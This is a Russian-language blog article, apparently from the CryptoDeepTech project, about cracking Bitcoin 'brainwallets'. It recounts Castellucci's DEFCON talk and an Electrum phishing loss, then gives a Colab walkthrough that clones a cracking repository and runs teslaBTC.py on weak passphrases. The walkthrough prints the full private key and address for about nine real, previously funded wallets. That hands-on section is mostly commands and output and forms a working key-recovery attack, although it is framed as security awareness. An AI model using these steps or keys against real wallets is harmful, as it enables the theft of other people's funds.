![](https://habrastorage.org/getpro/habr/upload_files/d3e/b31/e12/d3eb31e12dbe939992076b0b839bb6f3.png)
Для создания Биткоин кошелька существует множество форм. Один из первых методов создания Биткойн кошелька был известен как BrainWallet.BrainWallet
удобен в том плане, что позволяет хранить в памяти или в блокноте "парольную фразу". Парольная фраза хешируется с использованием алгоритма SHA-256
, и используется в качестве начального числа для создания приватного ключа.
Из-за своей популярности и простоты использования, многие
BrainWallet
за последние несколько лет использовались со слабыми парольными фразами.
Этот слабый способ генерации приватного ключа позволил злоумышленникам украсть довольно большое количество монет BTC
, просто взломав пароль против хэшей, хранящихся в блокчейне. Хотя эта атака известна уже много лет, она стала широко известна в 2015 году
благодаря работе, проделанной Райан Кастеллуччи (Ryan Castellucci)
7 августа 2015 года
Райан Кастеллуччи (Ryan Castellucci) выступил на DEFCON23 с докладом о взломе паролей BrainWallet. Хотя к этому моменту парольные фразы для BrainWallet
использовались уже много лет, разговор помог донести эти проблемы до более широкой общественности
Document [PDF]: Cracking Cryptocurrency Brainwallets Ryan Castellucci
Райан опубликовал результаты своей работы по взлому
BrainWallet
в сочетании с инструментом под названиемBrainFlayer
проверенный взломщик для криптовалютных кошельковBrainWallet
) и других алгоритмов с низким уровнем энтропии.
УСКОРЕНИЕ С ПОМОЩЬЮ GPU
![](https://habrastorage.org/getpro/habr/upload_files/87f/7ce/6d2/87f7ce6d2a7b0f55ea99f5b38033c904.png)
На данный момент пробный cracker
от Райана brainflayer модернизировали в различные софты, утилиты, скрипты и тому подобное, но все же был создан графический ускоритель для BrainWallet
при помощи поддержки среды выполнения графического процессора. Такие ускорители носят название TeslaBrainWallet от название семейства вычислительных систем NVIDIA® Tesla® V100
![](https://habrastorage.org/getpro/habr/upload_files/b97/5f5/0df/b975f50df1ff071705fc4660df86fcfe.png)
Фишинг
Многие сторонники Биткоина часто приводят BrainWallet
в качестве хорошего метода защиты средств от возможной конфискации, но к сожалению существуют много ловушек
для Bitcoin клиента Electrum
.
Хотя
Electrum
поддерживает все популярные аппаратные кошельки (например,Trezor
,Ledger
и пр.) В плоть до установления сторонних плагинов для расширения функционала кошелька, но если вы установите старую версию Биткоин кошелька вы можете подвергнуть риску потерять все криптовалютные монеты в кошельке.
![](https://habrastorage.org/getpro/habr/upload_files/f38/a38/705/f38a38705a61104eac3fec1fa281967b.png)
Эта ловушка популярна под словом "фишинг"
. В криптосообществе есть очень много печальных истории. Одним из самых крупных потерь от фишинга на сумму 1400 BTC (16 миллионов долларов США)
Согласно порталу криптоиндустрии "CryptoPotato"
![Cамая крупная потеря от фишинга на сумму 1400 BTC (16 миллионов долларов США) Cамая крупная потеря от фишинга на сумму 1400 BTC (16 миллионов долларов США)](https://habrastorage.org/getpro/habr/upload_files/53d/501/31d/53d50131d5bd815e8ab4e829f2c07127.png)
Анонимный биткойн-инвестор по имени
«1400BitcoinStolen»
заявил в воскресенье, что он потерял1400 BTC
после «глупой» установки старой версии популярного кошелькаElectrum
, но это оказалось фишинговой аферой.Ловушка:
Объясняя неприятный инцидент, потерпевший сказал, что не мог получить доступ к средствам
с 2017 года
. После настройки кошелька и попытки перевести1 BTC
он получил всплывающее сообщение с просьбой обновить свою систему безопасности, прежде чем он сможет осуществить перевод. К сожалению это была ловушка — попытка фишинга. По словам жертвы, он установил обновление, и все его средства были автоматически переведены на адрес кошелька хакеров, что сделало мошенников богачена 16 миллионов долларов США
.
Как не стать жертвой фишинга?
В наших ранних публикациях мы настойчиво рекомендуем всем:
использовать только проверенное ПО;
ознакомиться с исходным кодом;
делать сборку самостоятельно;
делать обновление;
Слабые парольные фразы
Перейдем к экспериментальной части:
Откроем [TerminalGoogleColab].
Воспользуемся репозиторием «13TeslaBrainWallet».
git clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/13TeslaBrainWallet/
ls
![](https://habrastorage.org/getpro/habr/upload_files/ea4/a8b/182/ea4a8b182c3f2dec717d0ba5065814ff.png)
Установим pip2 для Python 2.7
(т.к. с 20 сентября 2022 года Google Colab
не использует "pip2"
по умолчанию для "Python 2.7"
)
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
![](https://habrastorage.org/getpro/habr/upload_files/e6a/ce0/283/e6ace0283266b3d45070bdd532608002.png)
![](https://habrastorage.org/getpro/habr/upload_files/d08/ae0/e67/d08ae0e674562990102e79f241632282.png)
![](https://habrastorage.org/getpro/habr/upload_files/09c/d15/abe/09cd15abe73dc5e370ef9f25c75e5160.png)
Установим библиотеку криптографических подписей ECDSA
pip2 install ecdsa
![](https://habrastorage.org/getpro/habr/upload_files/b32/9b6/c71/b329b6c7144dd2b8127fc10af35c1f65.png)
Запуск Python-скрипта: teslaBTC.py
История слабых парольных фраз с положительным балансом монет BTC
Откроем bitaddress и проверим:
python2 teslaBTC.py "arretonprimaryschool"
![](https://habrastorage.org/getpro/habr/upload_files/244/db4/3c9/244db43c9b11dedf3623684d52223cbf.png)
Pass phrase: arretonprimaryschool
Private key: 0e57a34ee4cf2242bc331494981aa896e803c598cc4a0f890b2e85d6acb85f29
Bitcoin address: 16jLdtAxgXVwcG93MyPcNALXMCv3D6dyDB
![](https://habrastorage.org/getpro/habr/upload_files/19e/898/4f1/19e8984f167ef9016ab399abfbc02074.png)
python2 teslaBTC.py "correct horse battery staple"
![](https://habrastorage.org/getpro/habr/upload_files/c75/873/10d/c7587310dafe93cfbc5cdf8cbcb22a6e.png)
Pass phrase: correct horse battery staple
Private key: c4bbcb1fbec99d65bf59d85c8cb62ee2db963f0fe106f483d9afa73bd4e39a8a
Bitcoin address U: 1JwSSubhmg6iPtRjtyqhUYYH7bZg3Lfy1T
Bitcoin address C: 1C7zdTfnkzmr13HfA2vNm5SJYRK6nEKyq8
![](https://habrastorage.org/getpro/habr/upload_files/97a/03c/687/97a03c68708ccf42ff0d8353c9d08840.png)
![](https://habrastorage.org/getpro/habr/upload_files/308/83e/3b4/30883e3b410d3a03e451b37e40d2f40f.png)
python2 teslaBTC.py "This is the way the world ends."
![](https://habrastorage.org/getpro/habr/upload_files/ed0/d44/48b/ed0d4448b42141bdf4f04d1e7cc94865.png)
Pass phrase: This is the way the world ends.
Private key: 1bad2815705c693b4df94badf0f757c601d841bff62c40f9546432034a4c29b7
Bitcoin address: 1DnqpnCFiXqMhvRfdRzPcRao7yxyoeXgjf
![](https://habrastorage.org/getpro/habr/upload_files/594/d80/96f/594d8096f10f02e05286f74a2c81e16e.png)
python2 teslaBTC.py "The quick brown fox jumps over the lazy dog"
![](https://habrastorage.org/getpro/habr/upload_files/e14/d79/632/e14d796328d2f0958131e5219c684567.png)
Pass phrase: The quick brown fox jumps over the lazy dog
Private key: d7a8fbb307d7809469ca9abcb0082e4f8d5651e46d3cdb762d02d0bf37c9e592
Bitcoin address: 13w4Hn1BJQM4bjZZgYtXpyp4cioiw29tKj
![](https://habrastorage.org/getpro/habr/upload_files/4cc/daf/14d/4ccdaf14d74e7379b9f160c509655bf7.png)
python2 teslaBTC.py "just let the lovin take ahold"
![](https://habrastorage.org/getpro/habr/upload_files/e74/1ef/7a2/e741ef7a2c8bd6a0cec046d677e41ee0.png)
Pass phrase: just let the lovin take ahold
Private key: 5e6fa5565782e85f3e305c422388e687e4fc8c2e7c572748f57ff7a4d6ff736a
Bitcoin address: 1H6nTPQ8wqdQ3QFrGc1qy9r63acpTAkwvc
![](https://habrastorage.org/getpro/habr/upload_files/4fd/7cb/9c4/4fd7cb9c4c6a831453a577f91a1023f9.png)
python2 teslaBTC.py "en un lugar de la mancha"
![](https://habrastorage.org/getpro/habr/upload_files/375/fb6/81d/375fb681d891de3e84642285103bf099.png)
Pass phrase: en un lugar de la mancha
Private key: e9f852cd97283461e254da265a27d2bda07f245cb5f8a6ee622355fcec63eb8c
Bitcoin address: 1Gwd5BQCDsFrEvokGkto945smazwEMKqdo
![](https://habrastorage.org/getpro/habr/upload_files/031/479/542/0314795429f25f2ba27fbf1521eb9cfc.png)
python2 teslaBTC.py "The quick brown fox jumped over the lazy dog."
![](https://habrastorage.org/getpro/habr/upload_files/6c5/17c/7f8/6c517c7f8a99a9767987f0b6e2664cc2.png)
Pass phrase: The quick brown fox jumped over the lazy dog.
Private key: 68b1282b91de2c054c36629cb8dd447f12f096d3e3c587978dc2248444633483
Bitcoin address: 1E2Wgex1ZGfZ9gb4MBubJJ5bnABkk2pbZf
![](https://habrastorage.org/getpro/habr/upload_files/6a9/866/bf2/6a9866bf2cee350e2c2aa8a09ef20a26.png)
python2 teslaBTC.py "Thats what she said 1974"
![](https://habrastorage.org/getpro/habr/upload_files/d92/70c/13e/d9270c13ee19a7ea2ce3b19d66199a37.png)
Pass phrase: Thats what she said 1974
Private key: 0e3630f0f829d93afd8569f7c50aaced3d930353db8468d8c42b58d7f5ce1fdb
Bitcoin address: 113W1qXf6DsJFtqMnR53tqvLrVfjkjR7g5
![](https://habrastorage.org/getpro/habr/upload_files/dec/512/4a1/dec5124a1774b939cd296c4f68545a98.png)
python2 teslaBTC.py "lorem ipsum dolor sit amet"
![](https://habrastorage.org/getpro/habr/upload_files/405/d4e/f3b/405d4ef3b31f46aef3b278cfff23ac17.png)
Pass phrase: lorem ipsum dolor sit amet
Private key: 2f8586076db2559d3e72a43c4ae8a1f5957abb23ca4a1f46e380dd640536eedb
Bitcoin address: 1KRGyNbq2yM1vAXscib74Snp6AUuUHVi2g
![](https://habrastorage.org/getpro/habr/upload_files/b16/1d5/ae7/b161d5ae737830255fcf4f715f57a3b9.png)
Литература:
Данный видеоматериал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1
против слабых подписей ECDSA
в криптовалюте BITCOIN
Telegram: https://t.me/cryptodeeptech
Видеоматериал: https://youtu.be/r0fTtBDWTnw
Источник: https://cryptodeep.ru/tesla-brainwallet